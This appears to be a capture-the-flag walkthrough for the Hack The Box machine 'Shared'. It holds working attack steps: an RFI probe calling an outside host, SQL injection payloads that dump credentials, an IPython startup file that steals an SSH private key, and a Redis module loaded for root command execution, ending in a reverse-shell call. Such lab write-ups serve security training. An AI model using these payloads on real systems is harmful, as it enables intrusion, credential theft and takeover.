Scanning

TARGET=10.10.11.172 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT    STATE SERVICE    REASON         VERSION
22/tcp  open  tcpwrapped syn-ack ttl 63
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp  open  http       syn-ack ttl 63 nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://shared.htb
|_http-server-header: nginx/1.18.0
443/tcp open  ssl/http   syn-ack ttl 63 nginx 1.18.0
|_http-title: Did not follow redirect to https://shared.htb
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| tls-nextprotoneg: 
|   h2
|_  http/1.1
| ssl-cert: Subject: commonName=*.shared.htb/organizationName=HTB/stateOrProvinceName=None/countryName=US/localityName=None
| Issuer: commonName=*.shared.htb/organizationName=HTB/stateOrProvinceName=None/countryName=US/localityName=None

10.10.11.172    shared.htb

22

• Weird response, this port might be using a different encryption method

> ssh root@10.10.11.172 -vv
OpenSSH_9.0p1 Debian-1, OpenSSL 1.1.1o  3 May 2022
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf matched no files
debug1: /etc/ssh/ssh_config line 21: Applying options for *
debug2: resolve_canonicalize: hostname 10.10.11.172 is address
debug1: Connecting to 10.10.11.172 [10.10.11.172] port 22.
debug1: Connection established.

Web enum

> dirsearch -u https://shared.htb
[22:19:02] 301 -  169B  - /js  ->  https://shared.htb/js/ 
[22:20:33] 301 -  169B  - /app  ->  https://shared.htb/app/
[22:20:47] 301 -  169B  - /bin  ->  https://shared.htb/bin/
[22:20:53] 301 -  169B  - /cache  ->  https://shared.htb/cache/
[22:21:01] 301 -  169B  - /classes  ->  https://shared.htb/classes/
[22:21:07] 301 -  169B  - /config  ->  https://shared.htb/config/
[22:21:07] 200 -  411KB - /composer.lock
[22:21:29] 301 -  169B  - /docs  ->  https://shared.htb/docs/
[22:21:29] 301 -  169B  - /download  ->  https://shared.htb/download/
[22:21:30] 302 -    0B  - /download/  ->  ../
[22:22:05] 301 -  169B  - /img  ->  https://shared.htb/img/
[22:22:09] 200 -   55KB - /index.php
[22:22:12] 200 -    5KB - /INSTALL.txt
[22:22:17] 301 -  169B  - /js/tiny_mce  ->  https://shared.htb/js/tiny_mce/
[22:22:17] 302 -    0B  - /js/  ->  ../
[22:22:17] 302 -    0B  - /js/tiny_mce/  ->  ../
[22:22:33] 200 -   88B  - /Makefile
[22:22:44] 301 -  169B  - /modules  ->  https://shared.htb/modules/
[22:22:45] 302 -    0B  - /modules/  ->  ../
[22:23:01] 301 -  169B  - /pdf  ->  https://shared.htb/pdf/
[22:23:34] 200 -    3KB - /robots.txt
[22:23:55] 301 -  169B  - /src  ->  https://shared.htb/src/
[22:24:11] 301 -  169B  - /themes  ->  https://shared.htb/themes/
[22:24:12] 302 -    0B  - /themes/  ->  ../
[22:24:16] 301 -  169B  - /tools  ->  https://shared.htb/tools/
[22:24:20] 301 -  169B  - /upload  ->  https://shared.htb/upload/
[22:24:26] 301 -  169B  - /var  ->  https://shared.htb/var/

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://shared.htb/" -H "Host: FUZZ.shared.htb"

000002549:   200        64 L     151 W      3229 Ch     "checkout"

• https://shared.htb/INSTALL.txt, PrestaShop 1.7
• https://shared.htb/api.php?t_path_core=http://cirt.net/rfiinc.txt??&cmd=id

The PrestaShop webservice is disabled. Please activate it in the PrestaShop Back Office

# so the PrestaShop 1.7 exploit found online doesn't work

• https://checkout.shared.htb cookie is vulnerable to union injection

> {"test' and 0=1 union select 'a',(select group_concat(table_name separator '|') from information_schema.tables),'c'-- -":"10"}
user|product
> {"test' and 0=1 union select 'a',(select group_concat(column_name separator '|') from information_schema.columns where table_name='user'),'c'-- -":"10"}
id|username|password
> {"test' and 0=1 union select 'a',(select group_concat(concat(username,'|',password) separator ';') from user),'c'-- -":"10"}
james_mason|fc895d4eddc2fc12f995e18c865cf273
`james_mason:Soleil101`

login as james_mason and PE to dan_smith

> ssh james_mason@10.10.11.172

• found another account dan_smith
• The other user is running ipython from time to time. There is a known vulnerability for ipython from 8.0.0 and patched at 8.0.1 https://github.com/advisories/GHSA-pq7m-3gw7-gq5x

2022/08/01 18:55:33 CMD: UID=0    PID=1      | /sbin/init 
2022/08/01 18:56:01 CMD: UID=0    PID=39705  | /usr/sbin/CRON -f 
2022/08/01 18:56:01 CMD: UID=0    PID=39704  | /usr/sbin/CRON -f 
2022/08/01 18:56:01 CMD: UID=0    PID=39707  | /bin/bash /root/c.sh 
2022/08/01 18:56:01 CMD: UID=0    PID=39706  | /bin/sh -c /root/c.sh 
2022/08/01 18:56:01 CMD: UID=0    PID=39708  | sleep 5 
2022/08/01 18:56:01 CMD: UID=1001 PID=39709  | /bin/sh -c /usr/bin/pkill ipython; cd /opt/scripts_review/ && /usr/local/bin/ipython 
2022/08/01 18:56:01 CMD: UID=1001 PID=39710  | /bin/sh -c /usr/bin/pkill ipython; cd /opt/scripts_review/ && /usr/local/bin/ipython 
2022/08/01 18:56:01 CMD: UID=1001 PID=39711  | /usr/bin/python3 /usr/local/bin/ipython 
2022/08/01 18:56:06 CMD: UID=0    PID=39715  | /bin/bash /root/c.sh 
2022/08/01 18:56:06 CMD: UID=0    PID=39714  | /bin/bash /root/c.sh 
2022/08/01 18:56:06 CMD: UID=0    PID=39716  | perl -ne s/\((\d+)\)/print " $1"/ge 
2022/08/01 18:56:06 CMD: UID=0    PID=39717  | pidof redis-server 
2022/08/01 18:56:06 CMD: UID=0    PID=39720  | (s-server)

> mkdir -m 777 /opt/scripts_review/profile_default && mkdir -m 777 /opt/scripts_review/profile_default/startup && echo 'import os; os.system("cat /home/dan_smith/.ssh/id_rsa > /tmp/dan_smith.id_rsa")' > /opt/scripts_review/profile_default/startup/foo.py

• login as dan_smith to get the user flag

> ssh -i dan_smith.id_rsa dan_smith@10.10.11.172

pe

• linpeas enum found a redis server and a binary redis_connector_dev

root       40858  0.3  0.7  65104 14924 ?        Ssl  19:36   0:00 /usr/bin/redis-server 127.0.0.1:6379

[+] Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root dan_smith 33 Jul 31 23:41 /home/dan_smith/user.txt
-rwxr-x--- 1 root sysadmin 5974154 Mar 20 09:41 /usr/local/bin/redis_connector_dev

• donwload redis_connector_dev to local
• using strings on the file produces a lot of strings, but this is not helpful.
• But we can setup ncat as a fake listener on port 6379 and listen for the password

> nc -vnlp 6379
> ./redis_connector_dev

F2WHqJUz2WEz=Gqq

redis pe

• login to redis

> redis-cli
> auth F2WHqJUz2WEz=Gqq

• https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
• compile the module and upload to the target
• chnage the permission of the module

chmod 777 module.so

• then load the module in redis to achieve PE

# Keyspace
127.0.0.1:6379[1]> auth F2WHqJUz2WEz=Gqq
127.0.0.1:6379[1]> config set dir /root/
127.0.0.1:6379[1]> module load /home/dan_smith/module.so
127.0.0.1:6379[1]> module list
1) 1) "name"
   2) "system"
   3) "ver"
   4) (integer) 1
127.0.0.1:6379[1]> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379[1]> system.rev <ip> 4444